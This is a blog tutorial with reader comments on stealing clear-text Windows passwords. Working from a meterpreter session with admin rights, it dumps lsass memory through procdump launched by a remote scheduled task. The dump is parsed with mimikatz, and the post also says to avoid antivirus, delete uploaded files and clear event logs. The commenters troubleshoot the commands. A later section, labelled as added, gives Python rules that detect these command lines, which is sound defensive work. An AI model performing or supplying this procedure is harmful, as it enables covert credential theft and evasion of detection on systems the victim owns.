Friday, August 16, 2013

Mimikatz alpha to get clear text password via bat file without AV alert.


Mimikatz is a great tool for getting clear text passwords; it extracts them from memory. If you want to use it, here is my previous tutorial. It is also included in metasploit now. But most antivirus products now detect it, so we use another method to get clear text passwords using mimikatz alpha.

(1) It's a post-exploitation method, so first you have to get a meterpreter session using metasploit. If you are new, visit the metasploit section of the blog. You also need admin access on the box; for that you can use the bypassuac module of metasploit.

(2) First download the latest mimikatz, which contains the alpha version, from the following link.
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.7z

Then download procdump from the following link.
http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

(3) Now make a batch file named procdump.bat and paste the following code into it.

@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\dump_file.dmp 2>&1

(4) Now, from the meterpreter session, upload procdump.bat & the downloaded procdump.exe file to the C:\windows\temp folder.

(5) Now go to a shell from meterpreter &, if you are not in the temp directory, change to C:\windows\temp.
Now we create a scheduled task, so type the following command in the shell.

at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat

Here 192.168.1.3 is the target IP & 20:55 is the time at which the procdump batch file executes.
So what does this batch file do? It creates a process dump file using procdump.exe.

(6) Now download dump_file.dmp from the temp folder; then remove the uploaded files from the folder & clear ev.

We have the process dump file, so we can extract passwords from it using minidump. The only requirement is that we run mimikatz on the same version & architecture as the machine the dump was pulled from.

(7) Now extract the mimikatz archive which we downloaded in step (2).
Go to the alpha folder, then to the subfolder that matches your victim's OS, and put dump_file.dmp in that folder.

(8) Open mimikatz.exe, which is in the folder alpha/win32, from cmd & type the following command.
sekurlsa::minidump dump_file.dmp


(9) This is the final step; type this command in cmd.
sekurlsa::logonPasswords

The disadvantage of this process is the size of the dump file. In my case it's 25 MB, but it depends on the running processes.
Now you have all the credentials of the victim in clear text. If you face any difficulty, you can mention it in the comments.
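
For defenders: steps (3) to (5) leave recognisable command lines in process-creation logs (Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled). The following Python is an added example, not part of the original post; it flags the full-memory dump aimed at lsass, the at job that points into a temp folder, and the .dmp file written there. The event field names (image, cmdline), the rule names and the sample records are constructed for illustration.

```python
import ntpath
import re

# Files referenced under any \temp\ directory, with the extensions this post uses.
TEMP_FILE = re.compile(r'\\temp\\[^\s"]+?\.(bat|cmd|exe|dmp)\b', re.I)
# procdump's full-memory flag; matched on arguments, not on the image name.
FULL_DUMP = re.compile(r'(?:^|\s)[-/]ma\b', re.I)
LSASS = re.compile(r'\blsass(?:\.exe)?\b', re.I)

def classify(event):
    """Return the sorted rule names triggered by one process-creation event."""
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"]
    exts = {m.group(1).lower() for m in TEMP_FILE.finditer(cmd)}
    hits = set()
    if FULL_DUMP.search(cmd) and LSASS.search(cmd):
        hits.add("lsass_full_dump")
    if image == "at.exe" and exts & {"bat", "cmd", "exe"}:
        hits.add("at_job_from_temp")
    if "dmp" in exts:
        hits.add("dump_written_to_temp")
    return sorted(hits)

def scan(events):
    """Return (index, hits) for every event that triggers at least one rule."""
    results = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results.append((i, hits))
    return results

# Constructed sample records: two from the procedure above, two benign.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\at.exe",
     "cmdline": r"at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat"},
    {"image": r"C:\windows\temp\procdump.exe",
     "cmdline": r"C:\windows\temp\procdump.exe -accepteula -ma lsass.exe "
                r"C:\windows\temp\dump_file.dmp"},
    {"image": r"C:\Tools\procdump.exe",
     "cmdline": r"procdump.exe -ma notepad.exe C:\dumps\notepad.dmp"},
    {"image": r"C:\Windows\System32\at.exe",
     "cmdline": r"at 02:00 C:\scripts\backup.bat"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits, SAMPLE_EVENTS[idx]["cmdline"])
```

Command-line rules like these only work where command-line logging is turned on; Sysmon Event ID 10 (process access with lsass.exe as the target) covers dump tools that never name lsass in their arguments.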


7 comments:

Unknown said...

I tried the above but it keeps displaying ERROR

mimikatz # sekurlsa::logonPasswords full
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005

Please help me?

nirav desai said...

First I assume that you have enough privilege, and then one requirement is that we should be running mimikatz on the same version & architecture from where we pull. View the second image of the post for the compatibility issue. @Ammar Hashim

Unknown said...

I get the following error
sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed

Please help

rasheed said...

I tried the above but it keeps displaying ERROR

mimikatz # sekurlsa::logonPasswords full
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005

How to get system level priv from cmd?

smallwater said...

Run in administrator
Then : privilege::debug
Then : sekurlsa::logonPasswords

Unknown said...

Use "privilege::debug" before using your command.

Unknown said...

Is it possible to use such a procdump script on windows? If so, with which command?
